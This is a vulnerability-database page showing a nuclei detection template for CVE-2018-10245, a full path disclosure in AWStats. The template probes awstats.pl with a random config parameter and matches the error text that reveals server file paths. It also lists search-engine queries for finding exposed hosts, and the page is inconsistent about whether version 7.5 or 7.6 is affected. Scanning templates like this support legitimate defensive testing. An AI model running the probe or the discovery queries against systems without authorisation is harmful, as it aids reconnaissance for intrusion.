Lucene search
K

AWStats <= 7.5 - Full Path Disclosure

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

AWStats path disclosure in 7.6 via framename and update params; enables remote path reveal; patch to latest version.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-10245
29 Dec 202502:52
circl
CNVD
AWStats Information Disclosure Vulnerability
24 Apr 201800:00
cnvd
CVE
CVE-2018-10245
20 Apr 201817:00
cve
Cvelist
CVE-2018-10245
20 Apr 201817:00
cvelist
Debian CVE
CVE-2018-10245
20 Apr 201817:00
debiancve
EUVD
EUVD-2018-2319
7 Oct 202500:30
euvd
NVD
CVE-2018-10245
20 Apr 201817:29
nvd
OSV
DEBIAN-CVE-2018-10245
20 Apr 201817:29
osv
OSV
UBUNTU-CVE-2018-10245
20 Apr 201817:29
osv
Prion
Path traversal
20 Apr 201817:29
prion
Rows per page
id: CVE-2018-10245

info:
  name: AWStats <= 7.5 - Full Path Disclosure
  author: 0x_Akoko
  severity: medium
  description: |
    AWStats 7.6 contains a full path disclosure caused by improper handling of framename and update parameters in awstats.pl, letting remote attackers determine server file paths, exploit requires sending crafted parameters.
  impact: |
    Attackers can discover server file paths, aiding further exploitation or reconnaissance.
  remediation: |
    Update to the latest version of AWStats or apply security patches addressing this issue.
  reference:
    - https://github.com/eldy/awstats
    - https://awstats.sourceforge.io/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-200
    cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    shodan-query: 'http.html:"AWStats"'
    fofa-query: 'app="AWStats"'
    google-query: inurl:"awstats.pl"
  tags: cve,cve2018,awstats,fpd,disclosure,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/awstats.pl?config={{randstr}}"
      - "{{BaseURL}}/awstats/awstats.pl?config={{randstr}}"
      - "{{BaseURL}}/awstats.pl?config={{randstr}}"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "open config file", "after searching in path")
          - contains_any(body, "/etc/awstats", "/usr/", "/var/", "/opt/")
        condition: and
# digest: 4a0a0047304502200d03a9c0bbff6abb8a89d34f283c6171f7a6dd77fc771e872bfc3236ba972a97022100d510c21d7cd28ba0dbf0e58d129ac79fe53a59d5da889464fdbd53ed15647287:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 25
CVSS 35.3
EPSS0.01917
13